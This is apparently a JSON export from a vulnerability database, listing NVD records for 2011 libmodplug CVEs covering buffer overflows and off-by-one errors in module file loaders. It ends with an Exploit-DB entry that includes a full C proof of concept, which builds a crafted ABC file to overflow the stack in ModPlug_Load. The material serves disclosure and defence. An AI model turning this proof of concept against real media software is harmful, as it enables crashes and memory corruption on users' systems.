"http://jira.atheme.org/browse/AUDPLUG-394", "http://www.gentoo.org/security/en/glsa/glsa-201203-14.xml", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/68984", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.openwall.com/lists/oss-security/2011/08/12/4", "http://www.securityfocus.com/bid/48979", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html", "http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=f4e5295658fff000379caa122e75c9200205fe20", "http://ubuntu.com/usn/usn-1255-1", "http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html", "http://www.debian.org/security/2012/dsa-2415", "http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml"], "description": "Stack-based buffer overflow in the CSoundFile::ReadS3M function in src/load_s3m.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted S3M file with an invalid offset.", "edition": 2, "reporter": "NVD", "published": "2012-06-07T15:55:04", "title": "CVE-2011-2912", "type": "cve", "enchantments": {"score": {"modified": "2017-08-29T11:19:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-2912"], "scanner": [], "modified": "2017-08-28T21:29:52", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2912", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T11:19:36", "references": ["http://sourceforge.net/projects/modplug-xmms/files/libmodplug/0.8.8.4/", "http://www.openwall.com/lists/oss-security/2011/08/10/4", "http://jira.atheme.org/browse/AUDPLUG-394", "http://www.gentoo.org/security/en/glsa/glsa-201203-14.xml", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.openwall.com/lists/oss-security/2011/08/12/4", "http://www.securityfocus.com/bid/48979", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html", "http://ubuntu.com/usn/usn-1255-1", "http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=26243ab9fe1171f70053e9aec4b20e9f7de9e4ef", "http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html", "http://www.debian.org/security/2012/dsa-2415", "https://exchange.xforce.ibmcloud.com/vulnerabilities/68985", "http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml"], "description": "Off-by-one error in the CSoundFile::ReadAMS function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (stack memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of samples.", "edition": 2, "reporter": "NVD", "published": "2012-06-07T15:55:04", "title": "CVE-2011-2913", "type": "cve", "enchantments": {"score": {"modified": "2017-08-29T11:19:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-2913"], "scanner": [], "modified": "2017-08-28T21:29:52", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2913", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T11:19:36", "references": ["http://sourceforge.net/projects/modplug-xmms/files/libmodplug/0.8.8.4/", "http://www.openwall.com/lists/oss-security/2011/08/10/4", "http://jira.atheme.org/browse/AUDPLUG-394", "https://exchange.xforce.ibmcloud.com/vulnerabilities/68983", "http://www.gentoo.org/security/en/glsa/glsa-201203-14.xml", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.openwall.com/lists/oss-security/2011/08/12/4", "http://www.securityfocus.com/bid/48979", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html", "http://ubuntu.com/usn/usn-1255-1", "http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=2d4c56de314ab13e4437bd8b609f0b751066eee8", "http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html", "http://www.debian.org/security/2012/dsa-2415", "http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml"], "description": "Integer overflow in the CSoundFile::ReadWav function in src/load_wav.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted WAV file, which triggers a heap-based buffer overflow.", "edition": 2, "reporter": "NVD", "published": "2012-06-07T15:55:04", "title": "CVE-2011-2911", "type": "cve", "enchantments": {"score": {"modified": "2017-08-29T11:19:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-2911"], "scanner": [], "modified": "2017-08-28T21:29:52", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2911", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T11:19:36", "references": ["http://sourceforge.net/projects/modplug-xmms/files/libmodplug/0.8.8.4/", "http://www.openwall.com/lists/oss-security/2011/08/10/4", "http://jira.atheme.org/browse/AUDPLUG-394", "http://www.gentoo.org/security/en/glsa/glsa-201203-14.xml", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.openwall.com/lists/oss-security/2011/08/12/4", "https://exchange.xforce.ibmcloud.com/vulnerabilities/68987", "http://www.securityfocus.com/bid/48979", "http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=16d7a78efe14d345a6c5b241f88422ad0ee483ea", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html", "http://ubuntu.com/usn/usn-1255-1", "http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html", "http://www.debian.org/security/2012/dsa-2415", "http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml"], "description": "Off-by-one error in the CSoundFile::ReadAMS2 function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of instruments.", "edition": 2, "reporter": "NVD", "published": "2012-06-07T15:55:04", "title": "CVE-2011-2915", "type": "cve", "enchantments": {"score": {"modified": "2017-08-29T11:19:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-2915"], "scanner": [], "modified": "2017-08-28T21:29:52", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2915", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T11:19:36", "references": ["http://sourceforge.net/projects/modplug-xmms/files/libmodplug/0.8.8.4/", "http://www.openwall.com/lists/oss-security/2011/08/10/4", "http://jira.atheme.org/browse/AUDPLUG-394", "http://www.gentoo.org/security/en/glsa/glsa-201203-14.xml", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.openwall.com/lists/oss-security/2011/08/12/4", "http://www.securityfocus.com/bid/48979", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html", "http://ubuntu.com/usn/usn-1255-1", "http://www.osvdb.org/74211", "http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=26243ab9fe1171f70053e9aec4b20e9f7de9e4ef", "http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html", "http://www.debian.org/security/2012/dsa-2415", "https://exchange.xforce.ibmcloud.com/vulnerabilities/68985", "http://www.gentoo.org/security/en/glsa/glsa-201203-16.xml"], "description": "Off-by-one error in the CSoundFile::ReadDSM function in src/load_dms.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted DSM file with a large number of samples.", "edition": 3, "reporter": "NVD", "published": "2012-06-07T15:55:04", "title": "CVE-2011-2914", "type": "cve", "enchantments": {"score": {"modified": "2017-08-29T11:19:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-2914"], "scanner": [], "modified": "2017-08-28T21:29:52", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2914", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T15:17:36", "references": ["http://www.openwall.com/lists/oss-security/2011/05/02/1", "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "http://www.exploit-db.com/exploits/17222", "http://www.openwall.com/lists/oss-security/2011/05/02/19", "http://ubuntu.com/usn/usn-1148-1", "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060520.html", "http://www.debian.org/security/2012/dsa-2415"], "edition": 1, "description": "Multiple stack-based buffer overflows in the (1) abc_new_macro and (2) abc_new_umacro functions in src/load_abc.cpp in libmodplug before 0.8.8.3 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted ABC file. NOTE: some of these details are obtained from third party information.", "reporter": "NVD", "published": "2012-06-07T15:55:02", "title": "CVE-2011-1761", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T15:17:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-1761"], "scanner": [], "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "modified": "2013-09-10T02:20:56", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1761", "id": "CVE-2011-1761", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T07:27:45", "osvdbidlist": ["72157"], "references": [], "edition": 1, "description": "libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC. CVE-2011-1761. Dos exploit for linux platform", "reporter": "epiphant", "published": "2011-04-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "libmodplug <= 0.8.8.2 - .abc Stack-Based Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1761"], "modified": "2011-04-28T00:00:00", "id": "EDB-ID:17222", "href": "https://www.exploit-db.com/exploits/17222/", "sourceData": "#include <libmodplug/modplug.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n/*\r\nlibmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc\r\n\r\nhttp://modplug-xmms.sourceforge.net/\r\n\r\nby: epiphant\r\n\r\nthis exploits one of many overflows in load_abc.cpp lol\r\n\r\nvlc media player uses libmodplug\r\n\r\ngreets: defrost, babi, ming_wisher, emel1a, a.v., krs\r\n\r\ndate: 28 april 2011\r\n\r\ntested on: centos 5.6\r\n*/\r\n\r\nint main(void)\r\n{\r\n char test[512] = \"X: 1\\nU: \";\r\n unsigned int i;\r\n\r\n i = strlen(test);\r\n while (i < 278)\r\n test[i++] = 'Q';\r\n test[i++] = '1' + 32;\r\n test[i++] = '3';\r\n test[i++] = '3';\r\n test[i++] = '4';\r\n while (i < 286)\r\n test[i++] = 'A';\r\n test[i++] = '\\n';\r\n test[i] = '\\0';\r\n\r\n strcat(test, \"T: Here Without You (Transcribed by: Bungee)\\n\");\r\n strcat(test, \"Z: 3 Doors Down\\n\");\r\n strcat(test, \"L: 1/4\\n\");\r\n strcat(test, \"Q: 108\\n\");\r\n strcat(test, \"K: C\\n\\n\");\r\n strcat(test, \"[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\\n\");\r\n\r\n i = strlen(test);\r\n ModPlug_Load(test, i);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17222/"}]}
